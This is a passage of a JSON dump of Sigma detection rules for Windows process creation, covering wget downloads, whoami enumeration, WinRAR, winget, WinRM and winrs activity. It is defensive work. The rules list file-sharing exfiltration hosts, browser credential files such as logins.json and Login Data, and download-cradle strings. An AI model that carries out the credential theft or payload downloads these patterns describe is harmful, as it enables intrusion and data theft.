'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_flag:\n        - CommandLine|re: '\\s-O\\s'\n        - CommandLine|contains: '--output-document'\n    selection_ext:\n        CommandLine|endswith:\n            - '.ps1'\n            - \".ps1'\"\n            - '.ps1\"'\n            - '.dat'\n            - \".dat'\"\n            - '.dat\"'\n            - '.msi'\n            - \".msi'\"\n            - '.msi\"'\n            - '.bat'\n            - \".bat'\"\n            - '.bat\"'\n            - '.exe'\n            - \".exe'\"\n            - '.exe\"'\n            - '.vbs'\n            - \".vbs'\"\n            - '.vbs\"'\n            - '.vbe'\n            - \".vbe'\"\n            - '.vbe\"'\n            - '.hta'\n            - \".hta'\"\n            - '.hta\"'\n            - '.dll'\n            - \".dll'\"\n            - '.dll\"'\n            - '.psm1'\n            - \".psm1'\"\n            - '.psm1\"'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wget_download_susp_locations.yml",
    "content": "title: Suspicious File Download From IP Via Wget.EXE - Paths\nid: 40aa399c-7b02-4715-8e5f-73572b493f33\nstatus: test\ndescription: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe\nreferences:\n    - https://www.gnu.org/software/wget/manual/wget.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-23\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\wget.exe'\n        - OriginalFileName: 'wget.exe'\n    selection_ip:\n        CommandLine|re: '://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_flag:\n        - CommandLine|re: '\\s-O\\s'\n        - CommandLine|contains: '--output-document'\n    selection_paths:\n        - CommandLine|contains:\n              - ':\\PerfLogs\\'\n              - ':\\Temp\\'\n              - ':\\Users\\Public\\'\n              - ':\\Windows\\Help\\'\n              - ':\\Windows\\Temp\\'\n              - '\\Temporary Internet'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_where_browser_data_recon.yml",
    "content": "title: Suspicious Where Execution\nid: 725a9768-0f5e-4cb3-aec2-bc5719c6831a\nstatus: test\ndescription: |\n    Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\n    Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\n    internal network resources such as servers, tools/dashboards, or other related infrastructure.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-13\nmodified: 2022-06-29\ntags:\n    - attack.discovery\n    - attack.t1217\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    where_exe:\n        - Image|endswith: '\\where.exe'\n        - OriginalFileName: 'where.exe'\n    where_opt:\n        CommandLine|contains:\n            # Firefox Data\n            - 'places.sqlite'\n            - 'cookies.sqlite'\n            - 'formhistory.sqlite'\n            - 'logins.json'\n            - 'key4.db'\n            - 'key3.db'\n            - 'sessionstore.jsonlz4'\n            # Chrome Data\n            - 'History'\n            - 'Bookmarks'\n            - 'Cookies'\n            - 'Login Data'\n    condition: all of where_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_whoami_all_execution.yml",
    "content": "title: Enumerate All Information With Whoami.EXE\nid: c248c896-e412-4279-8c15-1c558067b6fa\nstatus: test\ndescription: Detects the execution of \"whoami.exe\" with the \"/all\" flag\nreferences:\n    - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/\n    - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/\n    - https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-12-04\nmodified: 2024-03-05\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main_img:\n        - Image|endswith: '\\whoami.exe'\n        - OriginalFileName: 'whoami.exe'\n    selection_main_cli:\n        CommandLine|contains|windash: ' -all'\n    condition: all of selection_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml",
    "content": "title: Whoami.EXE Execution From Privileged Process\nid: 79ce34ca-af29-4d0e-b832-fc1b377020db\nrelated:\n    - id: 80167ada-7a12-41ed-b8e9-aa47195c66a1\n      type: obsolete\nstatus: test\ndescription: Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/\nauthor: Florian Roth (Nextron Systems), Teymur Kheirkhabarov\ndate: 2022-01-28\nmodified: 2023-12-04\ntags:\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'whoami.exe'\n        - Image|endswith: '\\whoami.exe'\n    selection_user:\n        User|contains:\n            - 'AUTHORI'\n            - 'AUTORI'\n            - 'TrustedInstaller'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_whoami_groups_discovery.yml",
    "content": "title: Group Membership Reconnaissance Via Whoami.EXE\nid: bd8b828d-0dca-48e1-8a63-8a58ecf2644f\nstatus: test\ndescription: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-28\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\whoami.exe'\n        - OriginalFileName: 'whoami.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' /groups'\n            - ' -groups'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_whoami_output.yml",
    "content": "title: Whoami.EXE Execution With Output Option\nid: c30fb093-1109-4dc8-88a8-b30d11c95a5d\nstatus: test\ndescription: Detects the execution of \"whoami.exe\" with the \"/FO\" flag to choose CSV as output format or with redirection options to export the results to a file for later use.\nreferences:\n    - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/\n    - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/\n    - https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-28\nmodified: 2023-12-04\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main_img:\n        - Image|endswith: '\\whoami.exe'\n        - OriginalFileName: 'whoami.exe'\n    selection_main_cli:\n        CommandLine|contains:\n            - ' /FO CSV'\n            - ' -FO CSV'\n    selection_special:\n        CommandLine|contains: 'whoami*>'\n    condition: all of selection_main_* or selection_special\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml",
    "content": "title: Whoami.EXE Execution Anomaly\nid: 8de1cbe8-d6f5-496d-8237-5f44a721c7a0\nstatus: test\ndescription: Detects the execution of whoami.exe with suspicious parent processes.\nreferences:\n    - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/\n    - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/\n    - https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-12\nmodified: 2025-03-06\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\whoami.exe'\n        - OriginalFileName: 'whoami.exe'\n    filter_main_known_parents:\n        # This list can be any legitimate shell or application that you expect whoami to run from\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    filter_optional_ms_monitoring_agent:\n        ParentImage|endswith: ':\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe'\n    filter_main_parent_null:\n        ParentImage: null\n    filter_main_parent_empty:\n        ParentImage:\n            - ''\n            - '-'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Admin activity\n    - Scripts and administrative tools used in the monitored environment\n    - Monitoring activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_whoami_priv_discovery.yml",
    "content": "title: Security Privileges Enumeration Via Whoami.EXE\nid: 97a80ec7-0e2f-4d05-9ef4-65760e634f6b\nstatus: test\ndescription: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-05\nmodified: 2023-02-28\ntags:\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\whoami.exe'\n        - OriginalFileName: 'whoami.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' /priv'\n            - ' -priv'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml",
    "content": "title: Suspicious WindowsTerminal Child Processes\nid: 8de89e52-f6e1-4b5b-afd1-41ecfa300d48\nstatus: test\ndescription: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)\nreferences:\n    - https://persistence-info.github.io/Data/windowsterminalprofile.html\n    - https://twitter.com/nas_bench/status/1550836225652686848\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-25\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.persistence\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\WindowsTerminal.exe'\n            - '\\wt.exe'\n    selection_susp:\n        - Image|endswith:\n              # Add more LOLBINS\n              - '\\rundll32.exe'\n              - '\\regsvr32.exe'\n              - '\\certutil.exe'\n              - '\\cscript.exe'\n              - '\\wscript.exe'\n              - '\\csc.exe'\n        - Image|contains:\n              # Add more suspicious paths\n              - 'C:\\Users\\Public\\'\n              - '\\Downloads\\'\n              - '\\Desktop\\'\n              - '\\AppData\\Local\\Temp\\'\n              - '\\Windows\\TEMP\\'\n        - CommandLine|contains:\n              # Add more suspicious commandline\n              - ' iex '\n              - ' icm'\n              - 'Invoke-'\n              - 'Import-Module '\n              - 'ipmo '\n              - 'DownloadString('\n              - ' /c '\n              - ' /k '\n              - ' /r '\n    filter_builtin_visual_studio_shell:\n        CommandLine|contains|all:\n            - 'Import-Module'\n            - 'Microsoft.VisualStudio.DevShell.dll'\n            - 'Enter-VsDevShell'\n    filter_open_settings:\n        CommandLine|contains|all:\n            - '\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_'\n            - '\\LocalState\\settings.json'\n    filter_vsdevcmd:\n        CommandLine|contains|all:\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n            - '\\Common7\\Tools\\VsDevCmd.bat'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Other legitimate \"Windows Terminal\" profiles\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml",
    "content": "title: Add New Download Source To Winget\nid: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842\nrelated:\n    - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2\n      type: similar\n    - id: c15a46a0-07d4-4c87-b4b6-89207835a83b\n      type: similar\nstatus: test\ndescription: Detects usage of winget to add new additional download sources\nreferences:\n    - https://learn.microsoft.com/en-us/windows/package-manager/winget/source\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-17\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\winget.exe'\n        - OriginalFileName: 'winget.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'source '\n            - 'add '\n    condition: all of selection_*\nfalsepositives:\n    - False positive are expected with legitimate sources\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml",
    "content": "title: Add Insecure Download Source To Winget\nid: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2\nrelated:\n    - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842\n      type: similar\n    - id: c15a46a0-07d4-4c87-b4b6-89207835a83b\n      type: similar\nstatus: test\ndescription: |\n    Detects usage of winget to add a new insecure (http) download source.\n    Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\nreferences:\n    - https://learn.microsoft.com/en-us/windows/package-manager/winget/source\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-17\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\winget.exe'\n        - OriginalFileName: 'winget.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'source '\n            - 'add '\n            - 'http://'\n    condition: all of selection_*\nfalsepositives:\n    - False positives might occur if the users are unaware of such control checks\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml",
    "content": "title: Add Potential Suspicious New Download Source To Winget\nid: c15a46a0-07d4-4c87-b4b6-89207835a83b\nrelated:\n    - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842\n      type: similar\n    - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2\n      type: similar\nstatus: test\ndescription: Detects usage of winget to add new potentially suspicious download sources\nreferences:\n    - https://learn.microsoft.com/en-us/windows/package-manager/winget/source\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-17\nmodified: 2023-12-04\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\winget.exe'\n        - OriginalFileName: 'winget.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'source '\n            - 'add '\n    selection_source_direct_ip:\n        # This is a best effort. A better way to handle this is to limit it via whitelist. Check Group Policy for more details\n        CommandLine|re: '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml",
    "content": "title: Install New Package Via Winget Local Manifest\nid: 313d6012-51a0-4d93-8dfc-de8553239e25\nstatus: test\ndescription: |\n    Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.\n    The manifest option enables you to install an application by passing in a YAML file directly to the client.\n    Winget can be used to download and install exe, msi or msix files later.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install\n    - https://lolbas-project.github.io/lolbas/Binaries/Winget/\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nauthor: Sreeman, Florian Roth (Nextron Systems), frack113\ndate: 2020-04-21\nmodified: 2023-04-17\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\winget.exe'\n        - OriginalFileName: 'winget.exe'\n    selection_install_flag:\n        CommandLine|contains:\n            - 'install'\n            - ' add ' # https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCLICore/Commands/InstallCommand.h\n    selection_manifest_flag:\n        CommandLine|contains:\n            - '-m '\n            - '--manifest'\n    condition: all of selection_*\nfalsepositives:\n    - Some false positives are expected in some environment that may use this functionality to install and test their custom applications\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml",
    "content": "title: Winrar Compressing Dump Files\nid: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc\nrelated:\n    - id: ec570e53-4c76-45a9-804d-dc3f355ff7a7\n      type: similar\nstatus: test\ndescription: Detects execution of WinRAR in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.\nreferences:\n    - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-04\nmodified: 2023-09-12\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\rar.exe'\n              - '\\winrar.exe'\n        - Description: 'Command line RAR'\n    selection_extension:\n        CommandLine|contains:\n            - '.dmp'\n            - '.dump'\n            - '.hdmp'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of WinRAR with a command line in which \".dmp\" or \".dump\" appears accidentally\n    - Legitimate use of WinRAR to compress WER \".dmp\" files for troubleshooting\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrar_susp_child_process.yml",
    "content": "title: Potentially Suspicious Child Process Of WinRAR.EXE\nid: 146aace8-9bd6-42ba-be7a-0070d8027b76\nrelated:\n    - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343\n      type: similar\nstatus: test\ndescription: Detects potentially suspicious child processes of WinRAR.exe.\nreferences:\n    - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\n    - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-31\ntags:\n    - attack.execution\n    - attack.t1203\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\WinRAR.exe'\n    selection_binaries:\n        # Note: add additional binaries that the attacker might use\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'cscript.exe'\n              - 'mshta.exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'regsvr32.exe'\n              - 'RUNDLL32.EXE'\n              - 'wscript.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml",
    "content": "title: WinRAR Execution in Non-Standard Folder\nid: 4ede543c-e098-43d9-a28f-dd784a13132f\nstatus: test\ndescription: Detects a suspicious WinRAR execution in a folder which is not the default installation folder\nreferences:\n    - https://twitter.com/cyb3rops/status/1460978167628406785\nauthor: Florian Roth (Nextron Systems), Tigzy\ndate: 2021-11-17\nmodified: 2025-07-16\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\rar.exe'\n              - '\\winrar.exe'\n        - Description:\n              - 'Command line RAR'\n              - 'WinRAR'\n    filter_main_unrar:\n        # Note: we filter unrar as it has the same description as the other utilities, and we're only interested in compression\n        Image|endswith: '\\UnRAR.exe'\n    filter_main_path:\n        Image|contains:\n            - ':\\Program Files (x86)\\WinRAR\\'\n            - ':\\Program Files\\WinRAR\\'\n    filter_optional_temp:\n        # Note: in some occasion installers were seen dropping \"rar\" in TEMP\n        Image|contains: ':\\Windows\\Temp\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate use of WinRAR in a folder of a software that bundles WinRAR\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml",
    "content": "title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl\nid: 074e0ded-6ced-4ebd-8b4d-53f55908119d\nstatus: test\ndescription: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)\nreferences:\n    - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-06\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    contains_format_pretty_arg:\n        CommandLine|contains:\n            - 'format:pretty'\n            - 'format:\"pretty\"'\n            - 'format:\"text\"'\n            - 'format:text'\n    image_from_system_folder:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    contains_winrm:\n        CommandLine|contains: 'winrm'\n    condition: contains_winrm and (contains_format_pretty_arg and not image_from_system_folder)\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml",
    "content": "title: Remote Code Execute via Winrm.vbs\nid: 9df0dd3a-1a5c-47e3-a2bc-30ed177646a0\nstatus: test\ndescription: Detects an attempt to execute code or create service on remote host via winrm.vbs.\nreferences:\n    - https://twitter.com/bohops/status/994405551751815170\n    - https://redcanary.com/blog/lateral-movement-winrm-wmi/\n    - https://lolbas-project.github.io/lolbas/Scripts/Winrm/\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-07\nmodified: 2023-03-03\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        # Note: winrm.vbs can only be run by a process named cscript (see \"IsCScriptEnv\" function)\n        - Image|endswith: '\\cscript.exe'\n        - OriginalFileName: 'cscript.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'winrm'\n            - 'invoke Create wmicimv2/Win32_'\n            - '-r:http'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml",
    "content": "title: Remote PowerShell Session Host Process (WinRM)\nid: 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8\nstatus: test\ndescription: Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-09-12\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1059.001\n    - attack.t1021.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\wsmprovhost.exe'\n        - ParentImage|endswith: '\\wsmprovhost.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of remote Powershell, e.g. for monitoring purposes.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrm_susp_child_process.yml",
    "content": "title: Suspicious Processes Spawned by WinRM\nid: 5cc2cda8-f261-4d88-a2de-e9e193c86716\nstatus: test\ndescription: Detects suspicious processes including shells spawnd from WinRM host process\nauthor: Andreas Hunkeler (@Karneades), Markus Neis\nreferences:\n    - Internal Research\ndate: 2021-05-20\nmodified: 2022-07-14\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\wsmprovhost.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\sh.exe'\n            - '\\bash.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wsl.exe'\n            - '\\schtasks.exe'\n            - '\\certutil.exe'\n            - '\\whoami.exe'\n            - '\\bitsadmin.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate WinRM usage\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrs_local_command_execution.yml",
    "content": "title: Winrs Local Command Execution\nid: bcfece3d-56fe-4545-9931-3b8e92927db1\nstatus: experimental\ndescription: |\n    Detects the execution of Winrs.exe where it is used to execute commands locally.\n    Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.\nreferences:\n    - https://cardinalops.com/blog/living-off-winrm-abusing-complexity-in-remote-management/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs\nauthor: Liran Ravich, Nasreddine Bencherchali\ndate: 2025-10-22\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.t1021.006\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        # Note: Example of command to simulate (winrm needs to be enabled): \"c:\\Windows\\System32\\winrs.exe\" calc.exe\n        - Image|endswith: '\\winrs.exe'\n        - OriginalFileName: 'winrs.exe'\n    selection_local_ip:\n        CommandLine|contains|windash:\n            - '/r:localhost'\n            - '/r:127.0.0.1'\n            - '/r:[::1]'\n            - '/remote:localhost'\n            - '/remote:127.0.0.1'\n            - '/remote:[::1]'\n    filter_main_remote:\n        CommandLine|contains|windash:\n            - \"/r:\"\n            - \"/remote:\"\n    condition: all of selection_* or (selection_img and not 1 of filter_main_*)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrshost_command_execution.yml",
    "content": "title: Potential Lateral Movement via Windows Remote Shell\nid: 79df3f68-dccb-48e9-9171-b75cbc37c51d\nstatus: experimental\ndescription: |\n    Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.\nreferences:\n    - https://cardinalops.com/blog/living-off-winrm-abusing-complexity-in-remote-management/\n    - https://www.ired.team/offensive-security/lateral-movement/winrs-for-lateral-movement\nauthor: Liran Ravich\ndate: 2025-10-22\ntags:\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Note: Example of command to simulate (winrm needs to be enabled): \"c:\\Windows\\System32\\winrs.exe\" powershell\n        ParentImage|endswith: '\\winrshost.exe'\n    filter_main_conhost:\n        Image: 'C:\\Windows\\System32\\conhost.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate use of WinRM within the organization\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winzip_password_compression.yml",
